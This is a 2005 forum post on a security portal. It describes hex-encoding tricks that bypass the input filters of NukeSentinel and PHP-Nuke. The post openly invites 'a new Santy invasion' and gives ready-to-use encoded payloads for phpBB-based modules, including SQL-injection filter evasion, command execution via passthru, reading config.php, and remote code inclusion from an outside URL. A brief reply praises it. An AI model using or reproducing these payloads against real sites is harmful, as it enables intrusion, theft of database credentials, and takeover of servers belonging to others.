|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
NukeSentinel and PHP-Nuke security filters bypass |
|
Posted: Sun May 08, 2005 6:08 pm |
|
|
FistFucker |
Regular user |
|
|
Joined: May 06, 2005 |
Posts: 21 |
|
|
|
|
|
|
|
I couldn't send it to Full-Disclosure or Bugtraq. So I release it here. Have fun!
Code: |
Title: NukeSentinel and PHP-Nuke security filters bypass
Author: FistFucker
Contact: FistFuXXer@gmx.de
Date: May 08, 2005
1. NukeSentinel security filters bypass:
===========================================
The "Santy worm protection" in NukeSentinel can be bypassed by using hex
encoded characters in GET requests. It's also possible to bypass other
filters, like the "SQL injection filter" by the same way. I've not
tested higher versions than 2.1.4 (2.2.1 is out), but feel free to try it
out with newer ones!
Will be filtered:
'modules.php?highlight=FistFucker'
Will be bypassed:
'modules.php?hi%67hlight=FistFucker'
Will be filtered:
'/**/UNION/**/SELECT/**/'
Will be bypassed:
'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/'
Successfully tested against:
- NukeSentinel 2.1.3
- NukeSentinel 2.1.4
2. PHP-Nuke security filters bypass:
=======================================
PHP-Nuke filters some dangerous characters, like '(' followed by ')' in
GET requests. This can easily be bypassed with double hex encoded
characters. It should also work on many (or all?) PHP-Nuke based content
management systems, too.
Will be filtered:
'modules.php?FistFucker=()'
Will be bypassed:
'modules.php?FistFucker=%2528%2529'
Successfully tested against:
- PHP-Nuke <= 7.7
- PHPNUKE-CLAN <= 2.1.0
3. Let's start a new Santy invasion:
=======================================
Now, with this knowledge, we can inject the famous "Santy worm exploit"
into a PHP-Nuke and other content management systems with a module based
on phpBB <= 2.0.11! Note: it appends ')\b#i' to our string, so we must
use include URLs like: 'http://waraxe.us/?' and not 'http://waraxe.us/'.
Append it after: 'modules.php?&name=Forums&file=viewtopic&t=1'
Local command execution:
'&FistFucker=ls&%68%69%67%68%6C%69%67%68%74=%2527%252Epassthru%2528%24%48
%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69%73%74%46%75%63%6B%65%72%5D
%2529%252E%2527'
Local file output (config.php):
'&FistFucker=config.php&%68%69%67%68%6C%69%67%68%74=%2527%252Ereadfile
%2528%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69%73%74%46%75%63
%6B%65%72%5D%2529%252E%2527'
Remote code execution:
'&FistFucker=http://www.waraxe.us/%3F&%68%69%67%68%6C%69%67%68%74=%2527
%252Einclude_once%2528%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%46%69
%73%74%46%75%63%6B%65%72%5D%2529%252E%2527'
Successfully tested against:
- phpBB 2.10 port
- phpBB 2.10 port (with NukeSentinel 2.1.3)
- phpBB 2.10 port (with NukeSentinel 2.1.4)
- phpBB component v1.2.4 RC1
- PNphpBB2 1.2d
4. Private stuff:
====================
OfB-Clan are damn liers, don't trust them and don't support such people!
If you want some proofs of my innocence, contact me! Divine is sweet! :P
|
|
|
|
|
|
|
|
|
|
Posted: Thu May 12, 2005 9:14 am |
|
|
Ayurvedi |
Beginner |
|
|
Joined: Mar 20, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Simply Great! |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|